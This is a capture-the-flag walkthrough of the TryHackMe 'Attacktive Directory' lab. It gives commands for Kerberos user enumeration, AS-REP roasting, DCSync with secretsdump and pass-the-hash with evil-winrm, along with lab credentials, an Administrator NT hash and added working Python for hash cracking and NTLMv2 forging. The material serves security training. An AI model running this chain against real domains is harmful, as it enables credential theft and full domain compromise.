Port scanning

sudo nmap --min-rate 10000 -p- 10.10.55.102
[sudo] password for mikannse:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 21:23 CST
Warning: 10.10.55.102 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.55.102
Host is up (0.25s latency).
Not shown: 64327 closed tcp ports (reset), 1182 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49678/tcp open unknown
49685/tcp open unknown
49699/tcp open unknown
sudo nmap -sT -sV -sC -O -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,47001,49664,49665,49666,49668,49673,49674,49675,49678,49685,49699 10.10.55.102
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 21:25 CST
Nmap scan report for 10.10.55.102
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-24 13:25:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-09-24T13:26:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-09-23T13:21:48
|_Not valid after: 2024-03-24T13:21:48
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open unknown
49685/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (99%), Microsoft Windows 10 1709 - 1909 (96%), Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Longhorn (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2023-09-24T13:26:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.08 seconds
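
The port list for the second scan above was copied by hand out of the first. The helper below does the same from nmap's normal output; it is an added example, not part of the original writeup. SAMPLE is a trimmed copy of the first scan's own lines, and the rescan advice attached to the retransmission-cap warning is the editor's, not nmap's.

```python
"""Extract the open ports from an nmap normal-output report and build the -p
argument for the follow-up version/script scan.  Added example, not part of
the original writeup; SAMPLE is a trimmed copy of the first scan above."""
import re

SAMPLE = """\
Warning: 10.10.55.102 giving up on port because retransmission cap hit (10).
Not shown: 64327 closed tcp ports (reset), 1182 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
49664/tcp open unknown
"""

# "<port>/<proto> <state> <service>"; nmap may also print "open|filtered".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(open\|filtered|open|closed|filtered)\s+(\S+)")
FILTERED = re.compile(r"(\d+) filtered")
RETRANS_CAP = re.compile(r"retransmission cap hit")

def open_ports(report: str, proto: str = "tcp") -> list:
    """Ports in state 'open' for one protocol, in report order."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(2) == proto and m.group(3) == "open":
            ports.append(int(m.group(1)))
    return ports

def filtered_count(report: str) -> int:
    """Ports nmap never got an answer for; their state is unknown, not closed."""
    m = FILTERED.search(report)
    return int(m.group(1)) if m else 0

def hit_retransmission_cap(report: str) -> bool:
    """True when nmap warned that it gave up retransmitting.  With --min-rate
    10000 that usually means packet loss, so a slower rescan may show more."""
    return RETRANS_CAP.search(report) is not None

def port_arg(ports: list) -> str:
    """Comma-separated list for nmap -p."""
    return ",".join(str(p) for p in ports)

if __name__ == "__main__":
    ports = open_ports(SAMPLE)
    print("sudo nmap -sT -sV -sC -O -p" + port_arg(ports) + " 10.10.55.102")
    if hit_retransmission_cap(SAMPLE):
        print(f"{filtered_count(SAMPLE)} ports unanswered; consider a lower --min-rate")
```

Feed it the full first report and it prints the exact second command; the filtered count is worth watching on a 0.25 s latency link, since nmap's "filtered" here means no reply at all rather than a confirmed block.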

Add spookysec.local (10.10.55.102) to /etc/hosts.

Ports 139 and 445 show SMB is up. Following the room's hint, enumerate it with enum4linux:

enum4linux -a 10.10.55.102

The output gives the NetBIOS domain name:

THM-AD

The nmap scan also showed the DNS domain spookysec.local. Its .local suffix is the invalid TLD the room asks about: .local is reserved for multicast DNS (RFC 6762) and does not resolve on the public Internet, yet it remains a very common choice for Active Directory domains.

Kerberos (getting a shell)

Download the user and password wordlists the room provides.

kerbrute userenum userlist.txt --dc 10.10.55.102 -d spookysec.local -v

kerbrute confirms a fair number of valid usernames; the two the room's answers point at are svc-admin and backup.

The room hints that a ticket can be requested for some accounts without a password. This is AS-REP roasting: when an account has Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag in userAccountControl), the KDC answers an AS-REQ with an AS-REP whose encrypted part is keyed on the account's password hash, and that blob can be cracked offline.

Try both users: put them in user.txt and ask the DC for each.

impacket-GetNPUsers spookysec.local/  -usersfile user.txt -no-pass -dc-ip 10.10.55.102 -request>hash

Only svc-admin comes back with an AS-REP, so it is the account with pre-authentication disabled.

The hash line starts with $krb5asrep$23$, i.e. Kerberos 5 AS-REP etype 23 (RC4-HMAC); that is hashcat mode 18200 and john's krb5asrep format, which john detects on its own. Crack the hash file written above:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Password recovered: management2005

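john and hashcat crack an etype 23 AS-REP by deriving each candidate's NT hash and checking the RFC 4757 RC4-HMAC checksum with Kerberos key usage 8. The block below, an added example that is not part of the writeup or of either tool, performs exactly that per-candidate check. SAMPLE_HASH is constructed here from the page's principal and password with a placeholder plaintext; it is not the blob the DC returned. md4 and rc4 are written out because hashlib on OpenSSL 3 builds often lacks MD4.

```python
"""Per-candidate check behind cracking a $krb5asrep$23$ hash, as john
(krb5asrep) and hashcat -m 18200 do it.  Added example, not from the writeup.
SAMPLE_HASH is built with the encrypt routine below, not captured from the DC,
and its plaintext is a placeholder, not a real ASN.1 EncASRepPart."""
import hashlib
import hmac
import struct

_M32 = 0xFFFFFFFF
AS_REP_KEY_USAGE = 8  # RFC 4120 key usage number for the AS-REP enc-part

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _M32

def md4(msg: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    bit_len = len(msg) * 8
    msg += b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0, [3, 7, 11, 19], range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, [3, 5, 9, 13],
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, [3, 9, 11, 15],
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        w = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + fn(b, c, d) + w[k] + const) & _M32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: next step updates old d
        h = [(v + u) & _M32 for v, u in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmd5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4hmac_encrypt(key: bytes, usage: int, confounder: bytes, plaintext: bytes):
    """RFC 4757 encrypt: returns (checksum, ciphertext).  K2 == K1 for etype 23."""
    k1 = _hmd5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmd5(k1, data)
    return checksum, rc4(_hmd5(k1, checksum), data)

def rc4hmac_check(key: bytes, usage: int, checksum: bytes, ciphertext: bytes) -> bool:
    """Decrypt with the candidate key and see whether the HMAC still matches."""
    k1 = _hmd5(key, struct.pack("<I", usage))
    data = rc4(_hmd5(k1, checksum), ciphertext)
    return hmac.compare_digest(_hmd5(k1, data), checksum)

def parse_asrep23(line: str):
    """'$krb5asrep$23$user@REALM:<checksum hex>$<ciphertext hex>' -> parts."""
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("not an etype 23 AS-REP hash")
    principal, _, blob = line[len(prefix):].partition(":")
    chk, _, enc = blob.partition("$")
    return principal, bytes.fromhex(chk), bytes.fromhex(enc)

def crack_asrep23(line: str, wordlist):
    """First candidate whose NT hash verifies the AS-REP checksum, else None."""
    _, checksum, enc = parse_asrep23(line)
    for cand in wordlist:
        if rc4hmac_check(nt_hash(cand), AS_REP_KEY_USAGE, checksum, enc):
            return cand
    return None

def make_asrep23(principal: str, password: str, plaintext: bytes) -> str:
    """Constructed hash line for testing; real ones come from GetNPUsers."""
    chk, enc = rc4hmac_encrypt(nt_hash(password), AS_REP_KEY_USAGE, b"\x00" * 8, plaintext)
    return f"$krb5asrep$23${principal}:{chk.hex()}${enc.hex()}"

# Constructed: the writeup's principal and password, placeholder plaintext.
SAMPLE_HASH = make_asrep23("svc-admin@SPOOKYSEC.LOCAL", "management2005",
                           b"constructed stand-in for the EncASRepPart")
WORDLIST = ["password", "Summer2023", "management2005", "Welcome1"]

if __name__ == "__main__":
    print(crack_asrep23(SAMPLE_HASH, WORDLIST))  # management2005
```

The cost per candidate is one MD4 plus three HMAC-MD5 and one RC4 pass, which is why rockyou finishes in seconds and why pre-authentication matters: with it enabled the KDC never hands out anything keyed on the password to an unauthenticated client.
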
smbclient -L 10.10.55.102 -U svc-admin

Six shares are listed.

smbclient \\\\10.10.55.102\\backup -U svc-admin

The backup share holds a single text file whose content is base64. Decoding it gives a second set of credentials:

backup@spookysec.local:backup2517860

evil-winrm -i 10.10.55.102 -u backup -p backup2517860

evil-winrm did not work for me, so use the Remote Desktop service on 3389 instead.

I connected with remmina.

There is a flag on the desktop:

TryHackMe{B4ckM3UpSc0tty!}

svc-admin can log in over Remote Desktop too, and has its own flag:

TryHackMe{K3rb3r0s_Pr3_4uth}

Privilege escalation

The room hints at secretsdump, which Kali ships as part of impacket (the same script is also available as impacket-secretsdump).

Check the usage first, then dump only the Administrator account:

python /usr/share/doc/python3-impacket/examples/secretsdump.py -h |grep "NTDS.DIT"
python /usr/share/doc/python3-impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@spookysec.local -just-dc-user Administrator

-just-dc-user limits the NTDS extraction to the Administrator account.

secretsdump reports that it used the DRSUAPI method: it asks the DC to replicate the account's secrets over the directory replication RPC interface, the technique known as DCSync. That only works because the backup account holds the replication rights on the domain (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All); an ordinary domain user gets access denied.

Output lines have the form user:rid:lmhash:nthash:::. The Administrator's NT hash is:

0e0363213e37b94221497260b0bcb4fc

evil-winrm accepts the NT hash in place of a password (pass the hash): NTLM authentication over WinRM only ever proves knowledge of the hash, never of the plaintext password.

evil-winrm -i 10.10.55.102 -u administrator -H 0e0363213e37b94221497260b0bcb4fc
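
Pass the hash works because NTLM never sends or needs the plaintext: the proof of identity is an HMAC-MD5 chain keyed by the NT hash. The block below, an added example that is not from the writeup or from evil-winrm, computes an NTLMv2 response from the Administrator NT hash above and verifies it the way the DC does. The server challenge, client challenge, timestamp, target name and the domain string used in NTOWFv2 are all constructed, and the AV_PAIR list is a minimal stand-in for what a real DC sends.

```python
"""Why pass-the-hash works: an NTLMv2 proof is derived from the NT hash
alone (MS-NLMP 3.3.2), so whoever holds the hash can answer the server's
challenge without knowing the password.  Added example, not part of the
original writeup; challenge material, timestamp and names are constructed."""
import hashlib
import hmac
import struct

def _hmd5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed by the NT hash over UTF-16LE(UPPER(user) + domain)."""
    return _hmd5(nt_hash, (user.upper() + domain).encode("utf-16-le"))

def av_pairs(target_netbios: str) -> bytes:
    """Minimal AV_PAIR list: MsvAvNbDomainName (id 2) then MsvAvEOL (id 0)."""
    name = target_netbios.encode("utf-16-le")
    return struct.pack("<HH", 2, len(name)) + name + struct.pack("<HH", 0, 0)

def ntlmv2_blob(filetime: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure: RespType 1, HiRespType 1, 6 zero bytes, timestamp,
    8-byte client challenge, 4 zero bytes, AV pairs, 4 zero bytes."""
    head = struct.pack("<BB6sQ8s4s", 1, 1, b"\0" * 6, filetime, client_challenge, b"\0" * 4)
    return head + target_info + b"\0" * 4

def ntlmv2_response(nt_hash: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes):
    """Client side: NtChallengeResponse = NTProofStr || temp; also the session base key."""
    key = ntowf_v2(nt_hash, user, domain)
    proof = _hmd5(key, server_challenge + blob)
    return proof + blob, _hmd5(key, proof)

def verify_ntlmv2(nt_hash: bytes, user: str, domain: str,
                  server_challenge: bytes, response: bytes) -> bool:
    """Server side: recompute NTProofStr from the stored NT hash and compare."""
    proof, blob = response[:16], response[16:]
    key = ntowf_v2(nt_hash, user, domain)
    return hmac.compare_digest(proof, _hmd5(key, server_challenge + blob))

# NT hash from the writeup; everything else below is constructed.
ADMIN_NT = bytes.fromhex("0e0363213e37b94221497260b0bcb4fc")
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")  # constructed
CLIENT_CHALLENGE = bytes.fromhex("fedcba9876543210")  # constructed
FILETIME = 133400000000000000                         # constructed, 100 ns ticks since 1601
USER, DOMAIN = "Administrator", "spookysec.local"     # domain string assumed

def demo_response() -> bytes:
    """Build the response an attacker holding only ADMIN_NT would send."""
    blob = ntlmv2_blob(FILETIME, CLIENT_CHALLENGE, av_pairs("THM-AD"))
    response, _ = ntlmv2_response(ADMIN_NT, USER, DOMAIN, SERVER_CHALLENGE, blob)
    return response

if __name__ == "__main__":
    resp = demo_response()
    print("DC accepts:", verify_ntlmv2(ADMIN_NT, USER, DOMAIN, SERVER_CHALLENGE, resp))
```

Nothing in ntlmv2_response touches a password, which is the whole point: the NT hash is a password equivalent, and the only protections against reusing a dumped one are network level (Kerberos-only policies, SMB/WinRM signing, Protected Users, LAPS for local accounts), not the hash format itself.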

That gives an Administrator shell; root.txt:

TryHackMe{4ctiveD1rectoryM4st3r}

Closing thoughts

Guided rooms like this one suit a domain newbie like me, haha. I had already covered most of the material, so it doubled as a review!